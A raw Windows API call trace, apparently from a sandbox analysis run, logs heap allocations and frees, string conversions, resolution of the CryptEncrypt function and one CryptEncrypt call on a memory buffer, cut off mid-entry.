RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0134.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0134.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0134.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0134.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0134.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0134.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0134.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0134.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0134.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0134.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0134.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0134.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0134.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0134.914] CharLowerBuffW (in: lpsz="byte[79880]", cchLength=0xb | out: lpsz="byte[79880]") returned 0xb [0134.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0134.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0134.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0134.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0134.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0134.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0134.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0134.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0134.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0134.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0134.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0134.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0134.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0134.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0134.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0134.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13808) returned 0x2eb3b48 [0134.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0134.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0134.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0134.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0134.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0134.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0134.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0134.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0134.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0134.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0134.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0134.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0134.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0134.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0134.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0134.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0134.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0134.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0134.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0134.917] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0134.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0134.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0134.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0134.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0134.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0134.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0134.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0134.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0134.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ec7358 | out: hHeap=0x970000) returned 1 [0134.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0134.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0134.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2edab60 | out: hHeap=0x970000) returned 1 [0134.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0134.926] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.926] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0134.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0134.926] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0134.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0134.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0134.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0134.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0134.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0135.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0135.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0135.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0135.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0135.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0135.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0135.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0135.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0135.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0135.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0135.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0135.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ec7358 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0135.112] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0135.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0135.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0135.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0135.114] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0135.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0135.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0135.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e540a8 [0135.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0135.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0135.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0135.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0135.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0135.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0135.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0135.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0135.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0135.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0135.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0135.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0135.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0135.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0135.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0135.114] CryptEncrypt (in: hKey=0xa87610, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2eb3b48*, pdwDataLen=0x8cef60*=0x13800, dwBufLen=0x13808 | out: pbData=0x2eb3b48*, pdwDataLen=0x8cef60*=0x13808) returned 1 [0135.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0135.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0135.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0135.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0135.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0135.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0135.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0135.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0135.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0135.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0135.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0135.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0135.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0135.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0135.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0135.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0135.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0135.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0135.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0135.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0135.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0135.131] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0135.131] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0135.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0135.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0135.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0135.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0135.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0135.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0135.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0135.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0135.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0135.132] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0135.132] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0135.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0135.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0135.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0135.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: 